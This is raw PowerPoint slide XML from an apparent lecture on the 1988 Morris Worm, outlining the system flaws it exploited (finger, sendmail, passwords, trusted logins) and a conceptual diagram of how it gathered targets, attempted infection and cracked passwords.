                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flaws of the Systems: Finger(d), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Passwords, Trusted Logins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="3809723"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="3748614"/>
            <a:ext cx="7920992" cy="1321200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00336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521437">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Functionality of the Morris Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High-Level Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="864337" lvl="1" indent="-342900" defTabSz="521437">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detailed Functionalities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="5298878"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608042" y="5239381"/>
            <a:ext cx="7920992" cy="735006"/>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Aftermath</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3593927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Morris Worm: High-Level Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Gruppieren 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1015999" y="1549399"/>
            <a:ext cx="9893301" cy="4241801"/>
            <a:chOff x="850899" y="1498599"/>
            <a:chExt cx="9893301" cy="4241801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rechteck 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="850899" y="1498599"/>
              <a:ext cx="9893301" cy="4241801"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>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800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Morris Worm</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rechteck 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1187082" y="2057400"/>
              <a:ext cx="4320000" cy="3467100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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a:t>Main Program</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Two versions: Sun 3 and VAX</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Collect information about users and possible victims</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="742950" lvl="1" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Read public configuration files and run system utility programs</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="742950" lvl="1" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Save those information</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Use the described flaws to spread itself among the network by transferring the vector program</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rechteck 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5993400" y="2057400"/>
              <a:ext cx="4320000" cy="2819400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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a:t>Vector Program</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Small program (99 lines in C)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Transferred and invoked on the victim machine</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Transfers the main program to new victim</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Different names:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="742950" lvl="1" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Vector or grappling hook program</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="742950" lvl="1" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>L1.c program</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFontTx/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:endParaRPr lang="en-US" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3520980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Morris Worm: High-Level Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383721" y="1598624"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rechteck 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572228" y="1123945"/>
            <a:ext cx="9047543" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Current situation: Infection of a server is completed and main program starts working</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Grafik 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005659" y="2873782"/>
            <a:ext cx="1599701" cy="1915513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Grafik 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886594" y="2332213"/>
            <a:ext cx="1009598" cy="1318813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Grafik 28"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8751919" y="2593800"/>
            <a:ext cx="1009598" cy="1318813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Grafik 29"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7881854" y="3450858"/>
            <a:ext cx="1009598" cy="1318813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Grafik 30"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8853581" y="3681736"/>
            <a:ext cx="1009598" cy="1318813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49" name="Gruppieren 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="318444" y="1887083"/>
            <a:ext cx="2841445" cy="2320231"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="2841445" cy="2320231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Textfeld 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318444" y="3253207"/>
              <a:ext cx="2488556" cy="954107"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rechteck 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426352" y="1887083"/>
              <a:ext cx="1733537"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u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>List of Target Machines</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Verbinder: gewinkelt 24"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="28" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="709388" y="2536244"/>
              <a:ext cx="960139" cy="473789"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">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47" name="Gruppieren 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3159889" y="1943546"/>
            <a:ext cx="4636275" cy="1346876"/>
            <a:chOff x="3159889" y="1943546"/>
            <a:chExt cx="4636275" cy="1346876"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="Gruppieren 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4613700" y="1943546"/>
              <a:ext cx="3182464" cy="1346876"/>
              <a:chOff x="4476250" y="1573153"/>
              <a:chExt cx="3182464" cy="1346876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Textfeld 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4560253" y="1573153"/>
                <a:ext cx="3071493" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>2. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Infection attempts: </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                  <a:t>Sendmail</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Pfeil: nach rechts 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4476250" y="2642236"/>
                <a:ext cx="3182464" cy="27779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8" name="Gerade Verbindung mit Pfeil 37"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="28" idx="3"/>
              <a:endCxn id="8" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3159889" y="2293068"/>
              <a:ext cx="1537814" cy="4421"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">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46" name="Gruppieren 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1319949" y="3519661"/>
            <a:ext cx="6476215" cy="2373285"/>
            <a:chOff x="1319949" y="3519661"/>
            <a:chExt cx="6476215" cy="2373285"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Gruppieren 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="4692617"/>
              <a:ext cx="3470649" cy="1200329"/>
              <a:chOff x="1876855" y="4558974"/>
              <a:chExt cx="3470649" cy="1200329"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Textfeld 10"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1876855" y="4558974"/>
                <a:ext cx="3470649" cy="1200329"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>3. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Collect information about </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>users and hosts, try to break </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>password, try to connect to</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Victims with login-data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="14" name="Gruppieren 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4560252" y="4917314"/>
                <a:ext cx="610484" cy="487857"/>
                <a:chOff x="8000117" y="2650708"/>
                <a:chExt cx="2003858" cy="1496114"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12" name="Pfeil: nach oben gekrümmt 11"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8000117" y="2650708"/>
                  <a:ext cx="1793718" cy="720550"/>
                </a:xfrm>
                <a:prstGeom prst="curvedUpArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 40000"/>
                    <a:gd name="adj2" fmla="val 93008"/>
                    <a:gd name="adj3" fmla="val 25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Pfeil: nach oben gekrümmt 12"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8210257" y="3426272"/>
                  <a:ext cx="1793718" cy="720550"/>
                </a:xfrm>
                <a:prstGeom prst="curvedUpArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 40000"/>
                    <a:gd name="adj2" fmla="val 93008"/>
                    <a:gd name="adj3" fmla="val 25000"/>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15" name="Pfeil: nach rechts 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4624701" y="3519661"/>
              <a:ext cx="3171463" cy="27779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hteck 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5284258" y="4879932"/>
              <a:ext cx="1983673"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u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>User/Password/Hosts</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>User1/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>abc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/Host A, Host B</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="Gerade Verbindung mit Pfeil 42"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="42" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4790598" y="5285917"/>
              <a:ext cx="493660" cy="6865"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">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1924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Morris Worm: High-Level Description</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383721" y="1598624"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318444" y="3253207"/>
            <a:ext cx="2488556" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
